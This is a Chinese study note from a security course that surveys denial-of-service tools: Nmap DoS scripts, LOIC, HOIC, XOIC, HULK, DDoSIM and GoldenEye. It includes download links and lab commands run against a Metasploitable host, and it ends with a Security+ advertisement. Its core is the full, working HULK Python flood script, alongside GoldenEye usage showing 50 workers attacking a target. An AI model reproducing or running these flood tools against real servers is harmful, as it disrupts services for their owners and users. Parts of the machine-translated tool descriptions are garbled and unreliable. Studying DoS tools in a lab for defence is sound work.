【安全牛学习笔记】拒绝服务攻击工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye
2017-10-17 18:10
549 查看
拒绝服务攻击工具 Nmap - grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2 |
root@K:/usr/share/nmap/scripts# cat script.db | more
root@K:/usr/share/nmap/scripts# cat scirpt.db | grep dos
root@K:/usr/share/nmap/scripts# nmap -p445 --script=smb-vuln-regsvc-dos.nse 192.168.1.1
Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-05 08:08 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0037s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 14:75:90:21:4f:56 (Tp-link Technologies)
Nmap done: 1 IP address (1 host up) scanned in 0384 seconds
匿名者拒绝服务工具包 匿名者发布的Dos工具 - LOIC - HOIC - DDoSer 招募志愿者发放以上工具 以上Dos工具不隐藏真是IP地址 |
LOTC是一个最受欢迎的DOS攻击工具。 这个工具被去年流行的黑客集团匿名者用于对许多大公司的网络攻击。
它可以通过使用单个用户执行DOS攻击小型服务器,工具非常易于使用,即便你是一个初学者。 这个工具执行DOS攻击通过发送UDP,TCP或HTTP请求到受害者服务器。 你只需要知道服务器的IP地址或URL,其他的就交给这个工具吧
低轨道离子炮(LOIC)是一个开源的网站压力测试和抗拒绝服务测试工具,由C#语言开发。最初LOIC由Praetox科技开发,目前由开源社区维护。LOIC可以通过TCP或UDP洪水的方式形成拒绝服务攻击(DoS),因而可能打断业务正常运行,安全和测试人员在做评估网站压力测试时,请谨慎使用。 使用教程我记得我发过了自己在吧里找吧。
LOTC可以在linux系统上运行
HOIC不能再linux运行,能在windows运行
root@K:~# ifconfig
192.168.1.116
msfadmin@metasploitable:~$ ifconfig
192.168.1.119
HOIC不能再linux运行,能在windows运行
其他拒绝服务工具 XOIC - 攻击任意IP地址的指定端口 - git clone://git.code/sf.net/p/xoic/code xoic-code - http://xoicdoser.wordpress.com/ - 三种模式:test、normal、Dos Attack - 支持协议:TCP/HTTP/UDP/ICMP |
XOIC官网地址:http://xoicdoser.wordpress.com/,此链接里面的软件有恶意代码,建议不要下载!
XOIC是另一个不错的DOS攻击工具。它根据用户选择的端口与协议执行DOS攻击任何服务器。XOIC开发者还声称XOIC比上面的LOIC在很多方面更强大呢。
一般来说,该工具有三种攻击模式,第一个被称为测试模式,是非常基本的; 第二个是正常的DOS攻击模式; 最后一个是带有HTTP / TCP / UDP / ICMP消息的DOS攻击模式,。
对付小型网站来说,这是一个很有效的DDOS工具。 但是从来没有尝试的要小心点,你可能最终会撞自己的网站的服务器。
下载地址:https://sourceforge.net/projects/xoic/
其他拒绝服务工具 HULK - Http Unbearable Load King - Python脚本 - 随机产生大量唯一的地址请求,避免缓存命中 - 耗尽WEB服务器资源池 - https://packetstormsecurity.com/files/download/112856/hulk.zip |
Hulk DoS tool
Hulk DoS tool 移植到Python语言。原来的Python工具由巴里Shteiman
http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/
我只是移植的实用程序是快速和肮脏的。原函数的名字是保持和原来的逻辑大多保持太。次要功能添加:
您可以设置用于请求的自定义线程数
还设置了程序(好的去功能)所使用的内核的数量
程序正确杀掉Ctl+C
此工具针对性的负载测试,并可能真的很糟糕配置的服务器。明智地使用它。
实例
$ hulk -site http://example.com/test/ 2>/dev/null
$ HULKMAXPROCS=4096 hulk -site http://example.com 2>/tmp/errlog
有用的环境变量:
它设置为你的CPU GOMAXPROCS或更高一些。
hulkmaxprocs限制连接池(默认为1024)。创建高负载使用更高的价值。
更多细节:http://siberian.laika.name/node/7
许可证
亚力山大一grafov grafov@gmail.com版权
原绿巨人实用权威巴里Shteiman(http:/ / sectorix。com)。没有任何引用许可源比它不是GPL。问作者关于许可证的原始效用。
走巨人牌工具版本。看到许可证。
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author : Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729;
.NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print '---------------------------------------------------'
print 'USAGE: python hulk.py <url>'
print 'you can add "safe" after url, to autoshut after dos'
print '---------------------------------------------------'
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'Response Code 500'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100<request_counter) & (previous<>request_counter):
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "\n-- HULK Attack Finished --"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "-- HULK Attack Started --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
--------------------------------------------------------------------------------------
root@k:~# cd Desktop
root@k:~/Desktop# python hulk.py
----------------------------------------------------
USAGE: python hulk.py <url>
you can add "safe" affter url, to autoshut after dos
----------------------------------------------------
root@k:~/Desktop# python hulk.py http://192.168.1.119
其他拒绝服务工具 DDoSIM - 7层拒绝服务工具(模拟多个僵尸机) - 随机IP地址 - 基于TCP连接的攻击 - 应用层DDoS攻击 - 正常的HTTP请求、非正常的HTTP请求式DDoS - SMTP DDos - 随机端口的TCP连接洪水 |
DDOSIM是另一种流行的DOS攻击工具。 顾名思义,它是通过模拟控制几个僵尸主机执行DDOS攻击。所有僵尸主机创建完整的TCP连接到目标服务器。
这个工具是用c++写的,并且在Linux系统上运行。
这些是DDOSIM的主要特点:
模拟几个僵尸攻击
随机的IP地址
TCP-connection-based攻击
应用程序层DDOS攻击
HTTP DDos等有效的请求
与无效请求HTTP DDoS(类似于直流+ +攻击)
SMTP DDoS
TCP洪水连接随机端口
在这里下载DDOSIM: http://sourceforge.net/projects/ddosim/
其他拒绝服务工具 GoldenEye - http/https拒绝服务攻击工具 - 安全研究为目的的Python脚本 - 随机攻击向量,keep-alive,避免缓存命中 - wget https://github.com/jseidl/GoldenEye/archive/master.zip - unzip master.zip - ./goldeneye.py http://1.1.1.1 -w 50 |
黄金眼也是一个简单但有效的DOS攻击工具。 这是在Python测试开发的DOS攻击,但是人们也把它当做一种黑客工具了。
黄金眼
黄金是一个Python应用程序安全测试之用!
黄金是一个HTTP DoS测试工具。
攻击向量的剥削:HTTP keep-alive +非缓存
使用
USAGE: ./goldeneye.py <url> [OPTIONS]
OPTIONS:
Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help
公用事业
工具/ getuas.py -切取用户代理列表从http://www.useragentstring.com/pages/useragentstring.php子页面(例如,/ getuas.py http://www.useragentstring.com/pages/browserlist/)需要beautifulsoup4
RES /列表/用户代理文本列表(每行一个)用户代理字符串(从http://www.useragentstring.com)
更新日志
2014-02-20添加随机生成的用户代理(还是RFC标准)。
2014-02-19删除无聊的查阅情况和用户代理。参考改进的随机性。添加外部用户代理列表支持。
2013-03-26从线程处理。仍然有一些错误解决像我还不知道如何propperly关机经理。
2012-12-09初始释放
做
从对argparse getopt
从字符串。format() printf一样
许可证
本软件是在GNU通用公共许可证3版下的分布式(GPLv3)
法律公告
本软件提供的教育用途!如果你从事任何非法活动,作者不承担任何责任。通过使用这个软件,你同意这些条款。
下载: http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Tool.html
root@k:~/Desktop# wget https://github.com/jseidl/GoldenEye/archive/master.zip //安装黄金眼
root@k:~/Desktop# unzip master.zip //解压
root@k:~/Desktop# cd GoldenEye-master/
root@k:~/Desktop/GoldenEye-master# ls
goldeneye.py README.md res util
root@k:~/Desktop/GoldenEye-master# python goldeneye.py
Please supply at least the URL
------------------------------------------------------------------------------------------------------
GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>
USAGE: ./goldeneye.py <url> [OPTIONS]
OPTIONS:
FlagDescription
Default
-u, --useragentsFile with user-agents to use
(default: randomly generated)
-w, --workersNumber of concurrent workers
(default: 10)
-s, --socketsNumber of concurrent sockets
(default: 500)
-m, --methodHTTP Method to use 'get' or 'post' or 'random'(default: get)
-d, --debugEnable Debug Mode [more verbose output]
(default: False)
-h, --helpShows this help
------------------------------------------------------------------------------------------------------
root@k:~/Desktop/GoldenEye-master# python goldeneye.py http://192.168.1.119 -w 50 -m random
GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>
Hitting webserver in mode 'random' with 50 workers running 500 connections each. Hit CTRL+C to cancel.
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白
。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
相关文章推荐
- 【安全牛学习笔记】拒绝服务攻击工具
- 【安全牛学习笔记】拒绝服务介绍、DoS分类、个人DoS分类方法
- 攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
- 【安全牛学习笔记】WPS及其他工具
- (转载)攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
- 攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
- (原创)攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
- 攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS) [zt]
- OWASP WebGoat---安全测试学习笔记(十一)---拒绝服务
- 攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
- 【安全牛学习笔记】WPS及其他工具
- 攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
- 【转】建立全局的安全体系 防范“拒绝服务(DoS)”攻击
- Webservice学习笔记二,使用Axis发布简单的Web服务
- 【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架
- 【安全牛学习笔记】XSS-简介、跨站脚本检测和常见的攻击利用手段
- 新手学习WCF服务应用程序无废话摘要笔记(建立到发布)
- Sockstress:新而有效的DoS(拒绝服务)攻击
- 转:CXF学习笔记一:如何创建、发布和访问基于CXF的服务
- (转)CXF学习笔记一:如何创建、发布和访问基于CXF的服务